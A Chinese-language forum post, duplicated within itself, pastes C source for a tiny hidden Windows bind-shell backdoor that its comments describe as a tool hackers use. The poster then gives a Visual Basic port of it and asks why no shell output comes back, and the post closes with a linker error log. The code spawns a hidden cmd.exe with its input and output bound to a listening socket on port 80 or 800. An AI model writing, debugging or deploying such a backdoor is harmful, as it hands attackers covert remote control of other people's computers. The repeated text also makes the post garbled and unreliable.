以下是網上抄來的VC代碼.開端口為80.測式OK/*
1k(程序体积1kb)正向连接,零管道后门 By Anskya说明:
不用我多说了吧..黑客一般都会使用的后门程序..
这里只是简单的演示一下..没有添加进程隐藏功能
程序可以在Win9x,Win2k,WinXP,Win2k3上使用
程序体积只有1k(FSG压缩一下会更小)测试:
本地开启NetCat等工具,连接远程计算机80端口,会得到一个Shell
*/
#pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:Entrypoint")
#pragma comment(linker,"/INCREMENTAL:NO /IGNORE:4078")
#pragma comment(linker,"/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=Anskya /SECTION:Anskya,EWR")
#pragma comment(lib, "ws2_32.lib")#include <winsock2.h>
#include <windows.h>#define MasterPort 80 //连接端口void Entrypoint()
{
WSADATA WSADa;
sockaddr_in SockAddrIn;
SOCKET CSocket,SSocket;
int iAddrSize;
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo; char szCMDPath[255];
//-------------------
ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
ZeroMemory(&WSADa, sizeof(WSADATA));
//----初始化数据----
//获取cmd路径
GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));
//加载ws2_32.dll
WSAStartup(0x0202,&WSADa); //设置本地信息和绑定协议
SockAddrIn.sin_family = AF_INET;
SockAddrIn.sin_addr.s_addr = INADDR_ANY;
SockAddrIn.sin_port = htons(MasterPort);
CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
//绑定端口
bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));
listen(CSocket,1);
iAddrSize = sizeof(SockAddrIn);
SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);
//开始连接远程服务器
StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow = SW_HIDE;
StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
StartupInfo.hStdInput = (HANDLE)SSocket;
StartupInfo.hStdOutput = (HANDLE)SSocket;
StartupInfo.hStdError = (HANDLE)SSocket;
//创建匿名管道
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
//关闭进程句柄
closesocket(CSocket);
closesocket(SSocket);
WSACleanup();
//关闭连接卸载ws2_32.dll
}
============================================= 我跟據上面的VC用VB重寫.可以連接.但是創建管道輸入輸出不行.Attribute VB_Name = "Module1"
Option ExplicitPrivate Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" (ByVal lpBuffer As String, nSize As Long) As Long
Private Declare Function GetEnvironmentVariable Lib "kernel32" Alias "GetEnvironmentVariableA" (ByVal lpName As String, ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function htons Lib "ws2_32.DLL" (ByVal hostshort As Long) As Integer
Private Declare Function WSAStartup Lib "ws2_32.DLL" (ByVal wVR As Long, lpWSAD As WSADataType) As Long
Private Declare Function accept Lib "ws2_32.DLL" (ByVal s As Long, addr As sockaddr, namelen As Long) As Long
Private Declare Function listen Lib "ws2_32.DLL" (ByVal s As Long, ByVal backlog As Long) As Long
Private Declare Function WSACleanup Lib "ws2_32.DLL" () As Long
Private Declare Function socket Lib "ws2_32.DLL" (ByVal af As Long, ByVal s_type As Long, ByVal protocol As Long) As Long
Private Declare Function closesocket Lib "ws2_32.DLL" (ByVal s As Long) As Long
Private Declare Function bind Lib "ws2_32.DLL" (ByVal s As Long, addr As sockaddr, ByVal namelen As Long) As LongPrivate Const AF_INET = 2
Private Const INADDR_ANY = &H0
Private Const sockaddr_size = 16
Private Const STARTF_USESTDHANDLES = &H100&
Private Const STARTF_USESHOWWINDOW = &H1
Private Const INFINITE = -1
Private Const WSA_DESCRIPTIONLEN = 256
Private Const WSA_DescriptionSize = WSA_DESCRIPTIONLEN + 1
Private Const WSA_SYS_STATUS_LEN = 128
Private Const WSA_SysStatusSize = WSA_SYS_STATUS_LEN + 1
Private Const SOCK_STREAM = 1
Private Const IPPROTO_TCP = 6Private Type WSADataType
wVersion As Integer
wHighVersion As Integer
szDescription As String * WSA_DescriptionSize
szSystemStatus As String * WSA_SysStatusSize
iMaxSockets As Integer
iMaxUdpDg As Integer
lpVendorInfo As Long
End TypePrivate Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End TypePrivate Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadID As Long
End TypePrivate Type IN_ADDR
S_addr As Long
End TypePrivate Type sockaddr
sin_family As Integer
sin_port As Integer
sin_addr As IN_ADDR
sin_zero As String * 8
End TypeSub Main()
Dim res As Long
Dim rcc As Long
Dim port As Long
Dim SSocket As Long
Dim CSocket As Long
Dim sockin As sockaddr
Dim wVersionRequested As Long
Dim WSAData As WSADataType
Dim Start As STARTUPINFO
Dim Proc As PROCESS_INFORMATION
port = 800
wVersionRequested = &H202
WSAStartup wVersionRequested, WSAData
sockin.sin_family = AF_INET
sockin.sin_addr.S_addr = INADDR_ANY
sockin.sin_port = htons(port)
CSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
bind CSocket, sockin, sockaddr_size
listen CSocket, 1
SSocket = accept(CSocket, sockin, sockaddr_size)
Start.cb = Len(Start)
Start.wShowWindow = 0
Start.dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
Start.hStdInput = SSocket
Start.hStdOutput = SSocket
Start.hStdError = SSocket
res = CreateProcess(vbNullString, GetSystemPath, 0, 0, True, 0, ByVal 0&, vbNullString, Start, Proc)
rcc = WaitForSingleObject(Proc.hProcess, INFINITE)
CloseHandle Proc.hProcess
CloseHandle Proc.hThread
closesocket (CSocket)
closesocket (SSocket)
WSACleanup
End SubPrivate Function GetSystemPath() As String
Dim p As String * 255
Dim length As Long
Dim path As String
length = GetEnvironmentVariable("COMSPEC", p, Len(p))
path = Left(p, length)
GetSystemPath = path
End Function
哪位看下,是哪里错了,端口是开了,但连上后无反回
1k(程序体积1kb)正向连接,零管道后门 By Anskya说明:
不用我多说了吧..黑客一般都会使用的后门程序..
这里只是简单的演示一下..没有添加进程隐藏功能
程序可以在Win9x,Win2k,WinXP,Win2k3上使用
程序体积只有1k(FSG压缩一下会更小)测试:
本地开启NetCat等工具,连接远程计算机80端口,会得到一个Shell
*/
#pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:Entrypoint")
#pragma comment(linker,"/INCREMENTAL:NO /IGNORE:4078")
#pragma comment(linker,"/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=Anskya /SECTION:Anskya,EWR")
#pragma comment(lib, "ws2_32.lib")#include <winsock2.h>
#include <windows.h>#define MasterPort 80 //连接端口void Entrypoint()
{
WSADATA WSADa;
sockaddr_in SockAddrIn;
SOCKET CSocket,SSocket;
int iAddrSize;
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo; char szCMDPath[255];
//-------------------
ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
ZeroMemory(&WSADa, sizeof(WSADATA));
//----初始化数据----
//获取cmd路径
GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));
//加载ws2_32.dll
WSAStartup(0x0202,&WSADa); //设置本地信息和绑定协议
SockAddrIn.sin_family = AF_INET;
SockAddrIn.sin_addr.s_addr = INADDR_ANY;
SockAddrIn.sin_port = htons(MasterPort);
CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
//绑定端口
bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));
listen(CSocket,1);
iAddrSize = sizeof(SockAddrIn);
SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);
//开始连接远程服务器
StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow = SW_HIDE;
StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
StartupInfo.hStdInput = (HANDLE)SSocket;
StartupInfo.hStdOutput = (HANDLE)SSocket;
StartupInfo.hStdError = (HANDLE)SSocket;
//创建匿名管道
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
//关闭进程句柄
closesocket(CSocket);
closesocket(SSocket);
WSACleanup();
//关闭连接卸载ws2_32.dll
}
============================================= 我跟據上面的VC用VB重寫.可以連接.但是創建管道輸入輸出不行.Attribute VB_Name = "Module1"
Option ExplicitPrivate Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" (ByVal lpBuffer As String, nSize As Long) As Long
Private Declare Function GetEnvironmentVariable Lib "kernel32" Alias "GetEnvironmentVariableA" (ByVal lpName As String, ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function htons Lib "ws2_32.DLL" (ByVal hostshort As Long) As Integer
Private Declare Function WSAStartup Lib "ws2_32.DLL" (ByVal wVR As Long, lpWSAD As WSADataType) As Long
Private Declare Function accept Lib "ws2_32.DLL" (ByVal s As Long, addr As sockaddr, namelen As Long) As Long
Private Declare Function listen Lib "ws2_32.DLL" (ByVal s As Long, ByVal backlog As Long) As Long
Private Declare Function WSACleanup Lib "ws2_32.DLL" () As Long
Private Declare Function socket Lib "ws2_32.DLL" (ByVal af As Long, ByVal s_type As Long, ByVal protocol As Long) As Long
Private Declare Function closesocket Lib "ws2_32.DLL" (ByVal s As Long) As Long
Private Declare Function bind Lib "ws2_32.DLL" (ByVal s As Long, addr As sockaddr, ByVal namelen As Long) As LongPrivate Const AF_INET = 2
Private Const INADDR_ANY = &H0
Private Const sockaddr_size = 16
Private Const STARTF_USESTDHANDLES = &H100&
Private Const STARTF_USESHOWWINDOW = &H1
Private Const INFINITE = -1
Private Const WSA_DESCRIPTIONLEN = 256
Private Const WSA_DescriptionSize = WSA_DESCRIPTIONLEN + 1
Private Const WSA_SYS_STATUS_LEN = 128
Private Const WSA_SysStatusSize = WSA_SYS_STATUS_LEN + 1
Private Const SOCK_STREAM = 1
Private Const IPPROTO_TCP = 6Private Type WSADataType
wVersion As Integer
wHighVersion As Integer
szDescription As String * WSA_DescriptionSize
szSystemStatus As String * WSA_SysStatusSize
iMaxSockets As Integer
iMaxUdpDg As Integer
lpVendorInfo As Long
End TypePrivate Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End TypePrivate Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadID As Long
End TypePrivate Type IN_ADDR
S_addr As Long
End TypePrivate Type sockaddr
sin_family As Integer
sin_port As Integer
sin_addr As IN_ADDR
sin_zero As String * 8
End TypeSub Main()
Dim res As Long
Dim rcc As Long
Dim port As Long
Dim SSocket As Long
Dim CSocket As Long
Dim sockin As sockaddr
Dim wVersionRequested As Long
Dim WSAData As WSADataType
Dim Start As STARTUPINFO
Dim Proc As PROCESS_INFORMATION
port = 800
wVersionRequested = &H202
WSAStartup wVersionRequested, WSAData
sockin.sin_family = AF_INET
sockin.sin_addr.S_addr = INADDR_ANY
sockin.sin_port = htons(port)
CSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
bind CSocket, sockin, sockaddr_size
listen CSocket, 1
SSocket = accept(CSocket, sockin, sockaddr_size)
Start.cb = Len(Start)
Start.wShowWindow = 0
Start.dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
Start.hStdInput = SSocket
Start.hStdOutput = SSocket
Start.hStdError = SSocket
res = CreateProcess(vbNullString, GetSystemPath, 0, 0, True, 0, ByVal 0&, vbNullString, Start, Proc)
rcc = WaitForSingleObject(Proc.hProcess, INFINITE)
CloseHandle Proc.hProcess
CloseHandle Proc.hThread
closesocket (CSocket)
closesocket (SSocket)
WSACleanup
End SubPrivate Function GetSystemPath() As String
Dim p As String * 255
Dim length As Long
Dim path As String
length = GetEnvironmentVariable("COMSPEC", p, Len(p))
path = Left(p, length)
GetSystemPath = path
End Function
哪位看下,是哪里错了,端口是开了,但连上后无反回
-------------Configuration: 55 - Win32 Debug--------------------
Linking...
LINK : warning LNK4075: ignoring /EDITANDCONTINUE due to /INCREMENTAL:NO specification
x.obj : warning LNK4202: spawning full build due to /INCREMENTAL:NO directive
LINK : warning LNK4075: ignoring /EDITANDCONTINUE due to /INCREMENTAL:NO specification
LIBCD.lib(crt0.obj) : error LNK2001: unresolved external symbol _main
Debug/55.exe : fatal error LNK1120: 1 unresolved externals
Error executing link.exe.55.exe - 2 error(s), 3 warning(s)